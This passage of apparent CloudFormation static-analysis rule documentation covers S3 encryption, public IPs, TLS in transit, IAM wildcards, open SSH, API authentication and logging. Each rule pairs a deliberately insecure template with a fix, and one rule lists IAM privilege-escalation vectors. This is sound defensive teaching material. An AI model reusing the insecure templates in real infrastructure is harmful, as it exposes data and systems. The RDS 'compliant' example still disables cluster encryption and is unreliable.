    Type: 'AWS::S3::BucketPolicy'
    Properties:
      Bucket: "mycompliantbucket"
      PolicyDocument:
        Version: "2012-10-17"
        Statement:
          - Effect: Deny
            Principal:
              AWS: "*" # all principals should use https
            Action: "*" # for any actions
            Resource: arn:aws:s3:::mycompliantbucket/* # for any resources
            Condition:
              Bool:
                "aws:SecureTransport": false

See

cloudformation:S6329

Enabling public network access to cloud resources can affect an organization’s ability to protect its data or internal operations from data theft or disruption.

Depending on the component, inbound access from the Internet can be enabled via:

  • a boolean value that explicitly allows access to the public network.
  • the assignment of a public IP address.
  • database firewall rules that allow public IP ranges.

Deciding to allow public access may happen for various reasons such as for quick maintenance, time saving, or by accident.

This decision increases the likelihood of attacks on the organization, such as:

  • data breaches.
  • intrusions into the infrastructure to permanently steal from it.
  • and various malicious traffic, such as DDoS attacks.

Ask Yourself Whether

This cloud resource:

  • should be publicly accessible to any Internet user.
  • requires inbound traffic from the Internet to function properly.

There is a risk if you answered no to any of those questions.

Recommended Secure Coding Practices

Avoid publishing cloud services on the Internet unless they are intended to be publicly accessible, such as customer portals or e-commerce sites.

Use private networks (and associated private IP addresses) and VPC peering or other secure communication tunnels to communicate with other cloud components.

The goal is to prevent the component from intercepting traffic coming in via the public IP address. If the cloud resource does not support the absence of a public IP address, assign a public IP address to it, but do not create listeners for the public IP address.

Sensitive Code Example

DMS and EC2 instances have a public IP address assigned to them:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  DMSInstance:
    Type: AWS::DMS::ReplicationInstance
    Properties:
      PubliclyAccessible: true # sensitive, by default it's also set to true

  EC2Instance:
    Type: AWS::EC2::Instance
    Properties:
      NetworkInterfaces:
        - AssociatePublicIpAddress: true # sensitive, by default it's also set to true
          DeviceIndex: "0"

Compliant Solution

DMS and EC2 instances doesn’t have a public IP address:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  DMSInstance:
    Type: AWS::DMS::ReplicationInstance
    Properties:
      PubliclyAccessible: false

  EC2Instance:
    Type: AWS::EC2::Instance
    Properties:
      NetworkInterfaces:
        - AssociatePublicIpAddress: false
          DeviceIndex: "0"

See

cloudformation:S6245

Server-side encryption (SSE) encrypts an object (not the metadata) as it is written to disk (where the S3 bucket resides) and decrypts it as it is read from disk. This doesn’t change the way the objects are accessed, as long as the user has the necessary permissions, objects are retrieved as if they were unencrypted. Thus, SSE only helps in the event of disk thefts, improper disposals of disks and other attacks on the AWS infrastructure itself.

There are three SSE options:

  • Server-Side Encryption with Amazon S3-Managed Keys (SSE-S3)
    • AWS manages encryption keys and the encryption itself (with AES-256) on its own.
  • Server-Side Encryption with Customer Master Keys (CMKs) Stored in AWS Key Management Service (SSE-KMS)
    • AWS manages the encryption (AES-256) of objects and encryption keys provided by the AWS KMS service.
  • Server-Side Encryption with Customer-Provided Keys (SSE-C)
    • AWS manages only the encryption (AES-256) of objects with encryption keys provided by the customer. AWS doesn’t store the customer’s encryption keys.

Ask Yourself Whether

  • The S3 bucket stores sensitive information.
  • The infrastructure needs to comply to some regulations, like HIPAA or PCI DSS, and other standards.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to use SSE. Choosing the appropriate option depends on the level of control required for the management of encryption keys.

Sensitive Code Example

Server-side encryption is not used:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  S3Bucket:
    Type: 'AWS::S3::Bucket' # Sensitive

Compliant Solution

Server-side encryption with Amazon S3-Managed Keys is used:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  S3Bucket:
    Type: 'AWS::S3::Bucket' # Compliant
    Properties:
      BucketEncryption:
        ServerSideEncryptionConfiguration:
          - ServerSideEncryptionByDefault:
              SSEAlgorithm: AES256

See

cloudformation:S5332

Clear-text protocols such as ftp, telnet, or http lack encryption of transported data, as well as the capability to build an authenticated connection. It means that an attacker able to sniff traffic from the network can read, modify, or corrupt the transported content. These protocols are not secure as they expose applications to an extensive range of risks:

  • sensitive data exposure
  • traffic redirected to a malicious endpoint
  • malware-infected software update or installer
  • execution of client-side code
  • corruption of critical information

Even in the context of isolated networks like offline environments or segmented cloud environments, the insider threat exists. Thus, attacks involving communications being sniffed or tampered with can still happen.

For example, attackers could successfully compromise prior security layers by:

  • bypassing isolation mechanisms
  • compromising a component of the network
  • getting the credentials of an internal IAM account (either from a service account or an actual person)

In such cases, encrypting communications would decrease the chances of attackers to successfully leak data or steal credentials from other network components. By layering various security practices (segmentation and encryption, for example), the application will follow the defense-in-depth principle.

Note that using the http protocol is being deprecated by major web browsers.

In the past, it has led to the following vulnerabilities:

Ask Yourself Whether

  • Application data needs to be protected against falsifications or leaks when transiting over the network.
  • Application data transits over an untrusted network.
  • Compliance rules require the service to encrypt data in transit.
  • Your application renders web pages with a relaxed mixed content policy.
  • OS-level protections against clear-text traffic are deactivated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Make application data transit over a secure, authenticated and encrypted protocol like TLS or SSH. Here are a few alternatives to the most common clear-text protocols:
    • Use ssh as an alternative to telnet.
    • Use sftp, scp, or ftps instead of ftp.
    • Use https instead of http.
    • Use SMTP over SSL/TLS or SMTP with STARTTLS instead of clear-text SMTP.
  • Enable encryption of cloud components communications whenever it is possible.
  • Configure your application to block mixed content when rendering web pages.
  • If available, enforce OS-level deactivation of all clear-text traffic.

It is recommended to secure all transport channels, even on local networks, as it can take a single non-secure connection to compromise an entire application or system.

Sensitive Code Example

For AWS Kinesis Data Streams, server-side encryption is disabled by default:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  KinesisStream: # Sensitive
    Type: AWS::Kinesis::Stream
    Properties:
      ShardCount: 1
      # No StreamEncryption

For Amazon ElastiCache:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  Example:
    Type: AWS::ElastiCache::ReplicationGroup
    Properties:
      ReplicationGroupId: "example"
      TransitEncryptionEnabled: false  # Sensitive

For Amazon ECS:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  EcsTask:
    Type: AWS::ECS::TaskDefinition
    Properties:
      Family: "service"
      Volumes:
        -
          Name: "storage"
          EFSVolumeConfiguration:
            FilesystemId: !Ref FS
            TransitEncryption: "DISABLED"  # Sensitive

For AWS Load Balancer Listeners:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  HTTPlistener:
   Type: "AWS::ElasticLoadBalancingV2::Listener"
   Properties:
     DefaultActions:
       - Type: "redirect"
         RedirectConfig:
           Protocol: "HTTP"
     Protocol: "HTTP" # Sensitive

For Amazon OpenSearch domains:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  Example:
    Type: AWS::OpenSearchService::Domain
    Properties:
      DomainName: example
      DomainEndpointOptions:
        EnforceHTTPS: false # Sensitive
      NodeToNodeEncryptionOptions:
        Enabled: false # Sensitive

For Amazon MSK communications between clients and brokers:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  MSKCluster:
    Type: 'AWS::MSK::Cluster'
    Properties:
      ClusterName: MSKCluster
      EncryptionInfo:
        EncryptionInTransit:
          ClientBroker: TLS_PLAINTEXT # Sensitive
          InCluster: false # Sensitive

Compliant Solution

For AWS Kinesis Data Streams server-side encryption:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  KinesisStream:
    Type: AWS::Kinesis::Stream
    Properties:
      ShardCount: 1
      StreamEncryption:
         EncryptionType: KMS

For Amazon ElastiCache:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  Example:
    Type: AWS::ElastiCache::ReplicationGroup
    Properties:
      ReplicationGroupId: "example"
      TransitEncryptionEnabled: true

For Amazon ECS:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  EcsTask:
    Type: AWS::ECS::TaskDefinition
    Properties:
      Family: "service"
      Volumes:
        -
          Name: "storage"
          EFSVolumeConfiguration:
            FilesystemId: !Ref FS
            TransitEncryption: "ENABLED"

For AWS Load Balancer Listeners:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  HTTPlistener:
   Type: "AWS::ElasticLoadBalancingV2::Listener"
   Properties:
     DefaultActions:
       - Type: "redirect"
         RedirectConfig:
           Protocol: "HTTPS"
     Protocol: "HTTP"

For Amazon OpenSearch domains:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  Example:
    Type: AWS::OpenSearchService::Domain
    Properties:
      DomainName: example
      DomainEndpointOptions:
        EnforceHTTPS: true
      NodeToNodeEncryptionOptions:
        Enabled: true

For Amazon MSK communications between clients and brokers, data in transit is encrypted by default, allowing you to omit writing the EncryptionInTransit configuration. However, if you need to configure it explicitly, this configuration is compliant:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  MSKCluster:
    Type: 'AWS::MSK::Cluster'
    Properties:
      ClusterName: MSKCluster
      EncryptionInfo:
        EncryptionInTransit:
          ClientBroker: TLS
          InCluster: true

See

cloudformation:S6303

Using unencrypted RDS DB resources exposes data to unauthorized access.
This includes database data, logs, automatic backups, read replicas, snapshots, and cluster metadata.

This situation can occur in a variety of scenarios, such as:

  • A malicious insider working at the cloud provider gains physical access to the storage device.
  • Unknown attackers penetrate the cloud provider’s logical infrastructure and systems.

After a successful intrusion, the underlying applications are exposed to:

  • theft of intellectual property and/or personal data
  • extortion
  • denial of services and security bypasses via data corruption or deletion

AWS-managed encryption at rest reduces this risk with a simple switch.

Ask Yourself Whether

  • The database contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended to enable encryption at rest on any RDS DB resource, regardless of the engine.
In any case, no further maintenance is required as encryption at rest is fully managed by AWS.

Sensitive Code Example

For AWS::RDS::DBInstance and AWS::RDS::DBCluster:

AWSTemplateFormatVersion: '2010-09-09'
Resources:
  DatabaseInstance:
    Type: AWS::RDS::DBInstance
    Properties:
      StorageEncrypted: false  # Sensitive, disabled by default
  DatabaseCluster:
    Type: AWS::RDS:DBCluster
    Properties:
      StorageEncrypted: false  # Sensitive, disabled by default

Compliant Solution

For AWS::RDS::DBInstance and AWS::RDS::DBCluster:

AWSTemplateFormatVersion: '2010-09-09'
Resources:
  DatabaseInstance:
    Type: AWS::RDS::DBInstance
    Properties:
      StorageEncrypted: true
  DatabaseCluster:
    Type: AWS::RDS:DBCluster
    Properties:
      StorageEncrypted: false  # Sensitive, disabled by default

See

cloudformation:S6302

A policy that grants all permissions may indicate an improper access control, which violates the principle of least privilege. Suppose an identity is granted full permissions to a resource even though it only requires read permission to work as expected. In this case, an unintentional overwriting of resources may occur and therefore result in loss of information.

Ask Yourself Whether

Identities obtaining all the permissions:

  • only require a subset of these permissions to perform the intended function.
  • have monitored activity showing that only a subset of these permissions is actually used.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to apply the least privilege principle, i.e. by only granting the necessary permissions to identities. A good practice is to start with the very minimum set of permissions and to refine the policy over time. In order to fix overly permissive policies already deployed in production, a strategy could be to review the monitored activity in order to reduce the set of permissions to those most used.

Sensitive Code Example

A customer-managed policy that grants all permissions by using the wildcard (*) in the Action property:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  ExamplePolicy:
    Type: AWS::IAM::ManagedPolicy
    Properties:
        PolicyDocument:
            Version: "2012-10-17"
            Statement:
                - Effect: Allow
                  Action:
                    - "*" # Sensitive
                  Resource:
                    - !Ref MyResource
        Roles:
            - !Ref MyRole

Compliant Solution

A customer-managed policy that grants only the required permissions:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  ExamplePolicy:
    Type: AWS::IAM::ManagedPolicy
    Properties:
        PolicyDocument:
            Version: "2012-10-17"
            Statement:
                - Effect: Allow
                  Action:
                    - "s3:GetObject"
                  Resource:
                    - !Ref MyResource
        Roles:
            - !Ref MyRole

See

cloudformation:S6308

Amazon Elasticsearch Service (ES) is a managed service to host Elasticsearch instances.

To harden domain (cluster) data in case of unauthorized access, ES provides data-at-rest encryption if the Elasticsearch version is 5.1 or above. Enabling encryption at rest will help protect:

  • indices
  • logs
  • swap files
  • data in the application directory
  • automated snapshots

Thus, if adversaries gain physical access to the storage medium, they cannot access the data.

Ask Yourself Whether

  • The database contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended to encrypt Elasticsearch domains that contain sensitive information.

Encryption and decryption are handled transparently by ES, so no further modifications to the application are necessary.

Sensitive Code Example

For AWS::Elasticsearch::Domain:

AWSTemplateFormatVersion: '2010-09-09'
Resources:
  Elasticsearch:
    Type: AWS::Elasticsearch::Domain
    Properties:
      EncryptionAtRestOptions:
        Enabled: false  # Sensitive, disabled by default

Compliant Solution

For AWS::Elasticsearch::Domain:

AWSTemplateFormatVersion: '2010-09-09'
Resources:
  Elasticsearch:
    Type: AWS::Elasticsearch::Domain
    Properties:
      EncryptionAtRestOptions:
        Enabled: true

See

cloudformation:S6321

Why is this an issue?

Cloud platforms such as AWS support virtual firewalls that can be used to restrict access to services by controlling inbound and outbound traffic.
Any firewall rule allowing traffic from all IP addresses to standard network ports on which administration services traditionally listen, such as 22 for SSH, can expose these services to exploits and unauthorized access.

What is the potential impact?

Like any other service, administration services can contain vulnerabilities. Administration services run with elevated privileges and thus a vulnerability could have a high impact on the system.

Additionally, credentials might be leaked through phishing or similar techniques. Attackers who are able to reach the services could use the credentials to log in to the system.

How to fix it

It is recommended to restrict access to remote administration services to only trusted IP addresses. In practice, trusted IP addresses are those held by system administrators or those of bastion-like servers.

Code examples

Noncompliant code example

AWSTemplateFormatVersion: 2010-09-09
Resources:
  ExampleSecurityGroup:
    Type: AWS::EC2::SecurityGroup
    Properties:
      VpcId: !Ref ExampleVpc
      SecurityGroupIngress:
        - IpProtocol: tcp
          FromPort: 22
          ToPort: 22 # SSH traffic
          CidrIp: "0.0.0.0/0" # from all IP addresses is authorized

Compliant solution

AWSTemplateFormatVersion: 2010-09-09
Resources:
  ExampleSecurityGroup:
    Type: AWS::EC2::SecurityGroup
    Properties:
      VpcId: !Ref ExampleVpc
      SecurityGroupIngress:
        - IpProtocol: tcp
          FromPort: 22
          ToPort: 22
          CidrIp: "1.2.3.0/24"

Resources

Documentation

Standards

cloudformation:S6364

Reducing the backup retention duration can reduce an organization’s ability to re-establish service in case of a security incident.

Data backups allow to overcome corruption or unavailability of data by recovering as efficiently as possible from a security incident.

Backup retention duration, coverage, and backup locations are essential criteria regarding functional continuity.

Ask Yourself Whether

  • This component is essential for the information system infrastructure.
  • This component is essential for mission-critical functions.
  • Compliance policies require this component to be backed up for a specific amount of time.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Increase the backup retention period to an amount of time sufficient enough to be able to restore service in case of an incident.

Sensitive Code Example

For Amazon Relational Database Service clusters and instances:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  relationaldatabase:
    Type: 'AWS::RDS::DBInstance'
    Properties:
      DBName: NonCompliantDatabase
      BackupRetentionPeriod: 2 # Sensitive

Compliant Solution

For Amazon Relational Database Service clusters and instances:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  relationaldatabase:
    Type: 'AWS::RDS::DBInstance'
    Properties:
      DBName: CompliantDatabase
      BackupRetentionPeriod: 5
cloudformation:S6265

Predefined permissions, also known as canned ACLs, are an easy way to grant large privileges to predefined groups or users.

The following canned ACLs are security-sensitive:

  • PublicRead, PublicReadWrite grant respectively "read" and "read and write" privileges to everyone in the world (AllUsers group).
  • AuthenticatedRead grants "read" privilege to all authenticated users (AuthenticatedUsers group).

Ask Yourself Whether

  • The S3 bucket stores sensitive data.
  • The S3 bucket is not used to store static resources of websites (images, css …​).

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to implement the least privilege policy, ie to grant necessary permissions only to users for their required tasks. In the context of canned ACL, set it to private (the default one) and if needed more granularity then use an appropriate S3 policy.

Sensitive Code Example

All users (ie: anyone in the world authenticated or not) have read and write permissions with the PublicReadWrite access control:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  S3Bucket:
    Type: 'AWS::S3::Bucket' # Sensitive
    Properties:
      BucketName: "mynoncompliantbucket"
      AccessControl: "PublicReadWrite"

Compliant Solution

With the private access control (default), only the bucket owner has the read/write permissions on the buckets and its ACL.

AWSTemplateFormatVersion: 2010-09-09
Resources:
  S3Bucket:
    Type: 'AWS::S3::Bucket' # Compliant
    Properties:
      BucketName: "mycompliantbucket"
      AccessControl: "Private"

See

cloudformation:S6281

By default S3 buckets are private, it means that only the bucket owner can access it.

This access control can be relaxed with ACLs or policies.

To prevent permissive policies to be set on a S3 bucket the following settings can be configured:

  • BlockPublicAcls: to block or not public ACLs to be set to the S3 bucket.
  • IgnorePublicAcls: to consider or not existing public ACLs set to the S3 bucket.
  • BlockPublicPolicy: to block or not public policies to be set to the S3 bucket.
  • RestrictPublicBuckets: to restrict or not the access to the S3 endpoints of public policies to the principals within the bucket owner account.

Ask Yourself Whether

  • The S3 bucket stores sensitive data.
  • The S3 bucket is not used to store static resources of websites (images, css …​).
  • Many users have the permission to set ACL or policy to the S3 bucket.
  • These settings are not already enforced to true at the account level.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to configure:

  • BlockPublicAcls to true to block new attempts to set public ACLs.
  • IgnorePublicAcls to true to block existing public ACLs.
  • BlockPublicPolicy to true to block new attempts to set public policies.
  • RestrictPublicBuckets to true to restrict existing public policies.

Sensitive Code Example

By default, when not set, the PublicAccessBlockConfiguration is fully deactivated (nothing is blocked):

AWSTemplateFormatVersion: 2010-09-09
Resources:
  S3Bucketdefault:
    Type: 'AWS::S3::Bucket' # Sensitive
    Properties:
      BucketName: "example"

This PublicAccessBlockConfiguration allows public ACL to be set:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  S3Bucket:
    Type: 'AWS::S3::Bucket' # Sensitive
    Properties:
      BucketName: "example"
      PublicAccessBlockConfiguration:
        BlockPublicAcls: false # should be true
        BlockPublicPolicy: true
        IgnorePublicAcls: true
        RestrictPublicBuckets: true

Compliant Solution

This PublicAccessBlockConfiguration blocks public ACLs and policies, ignores existing public ACLs and restricts existing public policies:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  S3Bucket:
    Type: 'AWS::S3::Bucket' # Compliant
    Properties:
      BucketName: "example"
      PublicAccessBlockConfiguration:
        BlockPublicAcls: true
        BlockPublicPolicy: true
        IgnorePublicAcls: true
        RestrictPublicBuckets: true

See

cloudformation:S6317

Why is this an issue?

AWS Identity and Access Management (IAM) is the service that defines access to AWS resources. One of the core components of IAM is the policy which, when attached to an identity or a resource, defines its permissions. Policies granting permission to an Identity (a User, a Group or Role) are called identity-based policies. They add the ability to an identity to perform a predefined set of actions on a list of resources.

Here is an example of a policy document defining a limited set of permission that grants a user the ability to manage his own access keys.

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Action": [
                "iam:CreateAccessKey",
                "iam:DeleteAccessKey",
                "iam:ListAccessKeys",
                "iam:UpdateAccessKey"
            ],
            "Resource": "arn:aws:iam::245500951992:user/${aws:username}",
            "Effect": "Allow",
            "Sid": "AllowManageOwnAccessKeys"
        }
    ]
}

Privilege escalation generally happens when an identity policy gives an identity the ability to grant more privileges than the ones it already has. Here is another example of a policy document that hides a privilege escalation. It allows an identity to generate a new access key for any user from the account, including users with high privileges.

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Action": [
                "iam:CreateAccessKey",
                "iam:DeleteAccessKey",
                "iam:ListAccessKeys",
                "iam:UpdateAccessKey"
            ],
            "Resource": "*",
            "Effect": "Allow",
            "Sid": "AllowManageOwnAccessKeys"
        }
    ]
}

Although it looks like it grants a limited set of permissions, this policy would, in practice, give the highest privileges to the identity it’s attached to.

Privilege escalation is a serious issue as it allows a malicious user to easily escalate to a high privilege identity from a low privilege identity it took control of.

The example above is just one of many permission escalation vectors. Here is the list of vectors that the rule can detect:

Vector nameSummary

Create Policy Version

Create a new IAM policy and set it as default

Set Default Policy Version

Set a different IAM policy version as default

Create AccessKey

Create a new access key for any user

Create Login Profile

Create a login profile with a password chosen by the attacker

Update Login Profile

Update the existing password with one chosen by the attacker

Attach User Policy

Attach a permissive IAM policy like "AdministratorAccess" to a user the attacker controls

Attach Group Policy

Attach a permissive IAM policy like "AdministratorAccess" to a group containing a user the attacker controls

Attach Role Policy

Attach a permissive IAM policy like "AdministratorAccess" to a role that can be assumed by the user the attacker controls

Put User Policy

Alter the existing inline IAM policy from a user the attacker controls

Put Group Policy

Alter the existing inline IAM policy from a group containing a user that the attacker controls

Put Role Policy

Alter an existing inline IAM role policy. The rule will then be assumed by the user that the attacker controls

Add User to Group

Add a user that the attacker controls to a group that has a larger range of permissions

Update Assume Role Policy

Update a role’s "AssumeRolePolicyDocument" to allow a user the attacker controls to assume it

EC2

Create an EC2 instance that will execute with high privileges

Lambda Create and Invoke

Create a Lambda function that will execute with high privileges and invoke it

Lambda Create and Add Permission

Create a Lambda function that will execute with high privileges and grant permission to invoke it to a user or a service

Lambda triggered with an external event

Create a Lambda function that will execute with high privileges and link it to an external event

Update Lambda code

Update the code of a Lambda function executing with high privileges

CloudFormation

Create a CloudFormation stack that will execute with high privileges

Data Pipeline

Create a Pipeline that will execute with high privileges

Glue Development Endpoint

Create a Glue Development Endpoint that will execute with high privileges

Update Glue Dev Endpoint

Update the associated SSH key for the Glue endpoint

The general recommendation to protect against privilege escalation is to restrict the resources to which sensitive permissions are granted. The first example above is a good demonstration of sensitive permissions being used with a narrow scope of resources and where no privilege escalation is possible.

Noncompliant code example

This policy allows to update the code of any lambda function. Updating the code of a lambda executing with high privileges will lead to privilege escalation.

AWSTemplateFormatVersion: 2010-09-09

Resources:
  # Update Lambda code
  lambdaUpdatePolicy:
    # Noncompliant
    Type: AWS::IAM::ManagedPolicy
    Properties:
      ManagedPolicyName: lambdaUpdatePolicy
      PolicyDocument:
        Version: "2012-10-17"
        Statement:
          - Effect: Allow
            Action:
              - lambda:UpdateFunctionCode
            Resource: "*"

Compliant solution

Narrow the policy to only allow to update the code of certain lambda functions.

AWSTemplateFormatVersion: 2010-09-09

Resources:
  # Update Lambda code
  lambdaUpdatePolicy:
    Type: AWS::IAM::ManagedPolicy
    Properties:
      ManagedPolicyName: lambdaUpdatePolicy
      PolicyDocument:
        Version: "2012-10-17"
        Statement:
          - Effect: Allow
            Action:
              - lambda:UpdateFunctionCode
            Resource: "arn:aws:lambda:us-east-2:123456789012:function:my-function:1"

Resources

cloudformation:S6333

Creating APIs without authentication unnecessarily increases the attack surface on the target infrastructure.

Unless another authentication method is used, attackers have the opportunity to attempt attacks against the underlying API.
This means attacks both on the functionality provided by the API and its infrastructure.

Ask Yourself Whether

  • The underlying API exposes all of its contents to any anonymous Internet user.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

In general, prefer limiting API access to a specific set of people or entities.

AWS provides multiple methods to do so:

  • AWS_IAM, to use standard AWS IAM roles and policies.
  • COGNITO_USER_POOLS, to use customizable OpenID Connect (OIDC) identity providers (IdP).
  • CUSTOM, to use an AWS-independant OIDC provider, glued to the infrastructure with a Lambda authorizer.

Sensitive Code Example

A public API that doesn’t have access control implemented:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  ExampleMethod:
    Type: AWS::ApiGateway::Method
    Properties:
      AuthorizationType: NONE # Sensitive
      HttpMethod: GET

A Serverless Application Model (SAM) API resource that is public by default:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  ExampleApi: # Sensitive
    Type: AWS::Serverless::Api
    Properties:
      StageName: Prod

Compliant Solution

An API that implements AWS IAM permissions:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  ExampleMethod:
    Type: AWS::ApiGateway::Method
    Properties:
      AuthorizationType: AWS_IAM
      HttpMethod: GET

A Serverless Application Model (SAM) API resource that has to be requested using a key:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  ExampleApi:
    Type: AWS::Serverless::Api
    Properties:
      StageName: Prod
      Auth:
        ApiKeyRequired: true

See

cloudformation:S6258

Disabling logging of this component can lead to missing traceability in case of a security incident.

Logging allows operational and security teams to get detailed and real-time feedback on an information system’s events. The logging coverage enables them to quickly react to events, ranging from the most benign bugs to the most impactful security incidents, such as intrusions.

Apart from security detection, logging capabilities also directly influence future digital forensic analyses. For example, detailed logging will allow investigators to establish a timeline of the actions perpetrated by an attacker.

Ask Yourself Whether

  • This component is essential for the information system infrastructure.
  • This component is essential for mission-critical functions.
  • Compliance policies require this component to be monitored.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Enable the logging capabilities of this component. Depending on the component, new permissions might be required by the logging storage components.
You should consult the official documentation to enable logging for the impacted components. For example, AWS Application Load Balancer Access Logs require an additional bucket policy.

Sensitive Code Example

For Amazon S3 access requests:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  S3Bucket:
    Type: 'AWS::S3::Bucket' # Sensitive
    Properties:
      BucketName: "mynoncompliantbucket"

For Amazon API Gateway stages:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  Prod: # Sensitive
    Type: AWS::ApiGateway::Stage
    Properties:
      StageName: Prod
      Description: Prod Stage
      TracingEnabled: false # Sensitive

For Amazon Neptune clusters:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  Cluster:
    Type: AWS::Neptune::DBCluster
    Properties:
      EnableCloudwatchLogsExports: []  # Sensitive

For Amazon MSK broker logs:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  SensitiveCluster:
    Type: 'AWS::MSK::Cluster'
    Properties:
      ClusterName: Sensitive Cluster
      LoggingInfo:
        BrokerLogs: # Sensitive
          CloudWatchLogs:
            Enabled: false
            LogGroup: CWLG
          Firehose:
            DeliveryStream: DS
            Enabled: false

For Amazon DocDB:

AWSTemplateFormatVersion: "2010-09-09"
Resources:
  DocDBOmittingLogs: # Sensitive
    Type: "AWS::DocDB::DBCluster"
    Properties:
      DBClusterIdentifier : "DB Without Logs"

For Amazon MQ:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  Broker:
    Type: AWS::AmazonMQ::Broker
    Properties:
      Logs:  # Sensitive
        Audit: false
        General: false

For Amazon Redshift:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  ClusterOmittingLogging: # Sensitive
    Type: "AWS::Redshift::Cluster"
    Properties:
      DBName: "Redshift Warehouse Cluster"

For Amazon OpenSearch service or Amazon Elasticsearch service:

AWSTemplateFormatVersion: '2010-09-09'
Resources:
  OpenSearchServiceDomain:
    Type: 'AWS::OpenSearchService::Domain'
    Properties:
      LogPublishingOptions: # Sensitive
        ES_APPLICATION_LOGS:
          CloudWatchLogsLogGroupArn: 'arn:aws:logs:us-east-1:1234:log-group:es-application-logs'
          Enabled: true
        INDEX_SLOW_LOGS:
          CloudWatchLogsLogGroupArn: 'arn:aws:logs:us-east-1:1234:log-group:es-index-slow-logs'
          Enabled: true

For Amazon CloudFront distributions:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  CloudFrontDistribution: # Sensitive
    Type: AWS::CloudFront::Distribution
    Properties:
      DistributionConfig:
        DefaultRootObject: "index.html"

For Amazon Elastic Load Balancing:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  LoadBalancer:
      Type: AWS::ElasticLoadBalancing::LoadBalancer
      Properties:
        AccessLoggingPolicy:
          Enabled: false # Sensitive

For Amazon Load Balancing (v2):

AWSTemplateFormatVersion: 2010-09-09
Resources:
  ApplicationLoadBalancer:
   Type: AWS::ElasticLoadBalancingV2::LoadBalancer
   Properties:
     Name: CompliantLoadBalancer
     LoadBalancerAttributes:
       - Key: "access_logs.s3.enabled"
         Value: false # Sensitive

Compliant Solution

For Amazon S3 access requests:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  S3BucketLogs:
    Type: 'AWS::S3::Bucket'
    Properties:
      BucketName: "mycompliantloggingbucket"
      AccessControl: LogDeliveryWrite

  S3Bucket:
    Type: 'AWS::S3::Bucket'
    Properties:
      BucketName: "mycompliantbucket"
      LoggingConfiguration:
        DestinationBucketName: !Ref S3BucketLogs
        LogFilePrefix: testing-logs

For Amazon API Gateway stages:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  Prod:
    Type: AWS::ApiGateway::Stage
    Properties:
      StageName: Prod
      Description: Prod Stage
      TracingEnabled: true
      AccessLogSetting:
        DestinationArn: "arn:aws:logs:eu-west-1:123456789:test"
        Format: "..."

For Amazon Neptune clusters:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  Cluster:
    Type: AWS::Neptune::DBCluster
    Properties:
      EnableCloudwatchLogsExports: ["audit"]

For Amazon MSK broker logs:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  SensitiveCluster:
    Type: 'AWS::MSK::Cluster'
    Properties:
      ClusterName: Sensitive Cluster
      LoggingInfo:
        BrokerLogs:
          Firehose:
            DeliveryStream: DS
            Enabled: true
          S3:
            Bucket: Broker Logs
            Enabled: true
            Prefix: "logs/msk-brokers-"

For Amazon DocDB:

AWSTemplateFormatVersion: "2010-09-09"
Resources:
  DocDBWithLogs:
    Type: "AWS::DocDB::DBCluster"
    Properties:
      DBClusterIdentifier : "DB With Logs"
      EnableCloudwatchLogsExports:
         - audit

For Amazon MQ enable Audit or General:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  Broker:
    Type: AWS::AmazonMQ::Broker
    Properties:
      Logs:
        Audit: true
        General: true

For Amazon Redshift:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  CompliantCluster:
    Type: "AWS::Redshift::Cluster"
    Properties:
      DBName: "Redshift Warehouse Cluster"
      LoggingProperties:
        BucketName: "Infra Logs"
        S3KeyPrefix: "log/redshift-"

For Amazon OpenSearch service, or Amazon Elasticsearch service:

AWSTemplateFormatVersion: '2010-09-09'
Resources:
  OpenSearchServiceDomain:
    Type: 'AWS::OpenSearchService::Domain'
    Properties:
